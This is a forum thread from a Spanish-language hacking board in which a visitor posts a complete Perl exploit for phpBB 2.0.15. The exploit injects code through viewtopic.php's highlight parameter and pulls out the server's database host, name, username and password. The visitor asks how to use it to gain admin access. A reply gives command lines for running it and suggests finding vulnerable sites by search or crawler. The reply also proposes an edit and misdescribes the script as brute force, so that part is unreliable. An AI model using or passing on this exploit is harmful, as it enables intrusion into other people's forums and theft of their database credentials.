Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 04:31:21
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: PHPBB 2.0.15 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: PHPBB 2.0.15  (Leído 332 veces)
skinnedpt
Visitante
« en: Octubre 10, 2006, 06:20:39 »
I have one frum 2.0.15 and i want to test this exploit or other give me admin acess.
PhpBB 2.0.15 Database Authentication Details Exploit
Código:
#!/usr/bin/perl

# tested and working /str0ke

#        ********************************************************************
#       **********************************************************************
#      ****                                                                 **
#     ***      ******       *******************                             **
#    ***    ***   ****   ***********************                            **
#   ***   ***     ****                       ****      *   ***    *****     **
#  ***   ***      ***                ***     ***      *  **  **   **        **
# ***   ***                         ***      **         **   **  **         **
#***   ***                          ***    ***          **   **  *****      **
#**   ***                          ***  ****           **   **      **      **
#**   ***       ***  ***   ******* *******             **  ***      **      **
#**   ***      ***   ***  **      *** ***              **  **  **  **       **
#**  ***      ***   ***  **      ***  ***               ***   *****         **
#**   ***     ***   *** **       ***  ***                                   **
#**   ****   ***    ****        ***   ***                                   **
#**     *******    ****   ********     ***********************************  **
#**         ***                                                             **
#**        ***                                                              **
#**                                                                         **
#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability     **
#**      This exploit gives the user all the details about the database     **
#**      connection such as database host, username, password and           **
#**      database name.                                                     **
#**                                                                         **
#**              Written by SecureD,  gvr.secured<AT>gmail<DOT>com,2005     **
#**                                                                         **
#**      Greetings to GvR, Jumento, PP, CKrew & friends              **
#**                                                                         **
#*****************************************************************************
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "|           PhpBB 2.0.15 Database Authentication Details Exploit        |\r\n";
print "|                 By SecureD gvr.secured<AT>gmail<DOT>com               |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if ( @ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER         - Server where PhpBB is installed.\r\n";
print "DIR            - PHPBB directory or / for no directory.\r\n";
print "THREADID       - Id of an existing thread.\r\n";
print "COOKIESTRING   - Optional, cookie string of the http request.\r\n";
print "                 Use this when a thread needs authentication for viewing\r\n";
print "                 You can use Firefox in combination with \"Live HTTP\r\n";
print "                 Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting      OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push( @array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host:  " . $array[0] . "\n";
sleep(1);
print "[+] Database Name:  " . $array[1] . "\n";
sleep(1);
print "[+] Username:       " . $array[2] . "\n";
sleep(1);
print "[+] Password:       " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}

# milw0rm.com [2005-07-03]

what i need to do to use this? Thanks and i'm new in underground scene.
En línea
arvin
Visitante
« Respuesta #1 en: Octubre 10, 2006, 06:40:57 »

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion   put the source please, the kids must know the origin...


First you must know how the perl code has made and recreate the "scene" of phpbb vulnerability works!


Second, if you run that exploit (in the case of you know all about perl and exploit coding) under windows you'll need a perl interpreter or just install cygwin and run on the perl dir (place that on cygwin binaries):


you      @cygwin:#perl phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=<cookie_string_here>


or maybe if you use linux:


you      @distro:# perl phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=<cookie_string_here>



You'll need for necesary if the target have the phpbb rigth version (PhpBB 2.0.15)  this is simple, seek on google for PhpBB 2.0.15   string:


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

or run a crawler to revelate that!


try first for learn more about perl languaje and "exploitation techniques".

EDITED:

i see inside of the exploit code, this is a classical brute force and is not an effective start, you'll see:


while ($answer = <$sock>) {
   $delimitIndex = index $answer, $delimit;
   if ($delimitIndex >= 0) {
      $succes = 1;
      $urlIndex = index $answer, "href";
      if ($urlIndex < 0){
         $answer = substr($answer, length($delimit));
         $length = 0;
         while (length($answer) > 0) {
            $nex = index($answer, $delimit);
            if ($nex > 0) {
               push(     @array, substr($answer, 0, $nex));
               $answer = substr($answer, $nex + length($delimit), length($answer));
            } else {
               $answer= "";
            }
         }
      }
   }
}



Actually those lines:

         while (length($answer) > 0) {
            $nex = index($answer, $delimit);
            if ($nex > 0) {
               push(     @array, substr($answer, 0, $nex));
               $answer = substr($answer, $nex + length($delimit), length($answer));
            } else {
               $answer= "";
            }
   


   if ($delimitIndex >= 0) {
      $succes = 1;
      $urlIndex = index $answer, "href";
      



are not effective against these phpbb, i don't know exactly but try to change for that:


change those lines for:



   if ($delimitIndex >= 0) {
      $succes = 1;
      $urlIndex = index $answer, "href";


         while (length($answer) > 0) {
            $nex = index($answer, $delimit);
            if ($nex > 0) {
               push(     @array, substr($answer, 0, $nex));
               $answer = substr($answer, $nex + length($delimit), length($answer));
            } else {
               $answer= "hr";
            }
         }


so, try and come back for discuss that....




cheers
« Última modificación: Octubre 10, 2006, 07:49:23 por AzRaEL » En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: PHPBB 2.0.15 « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC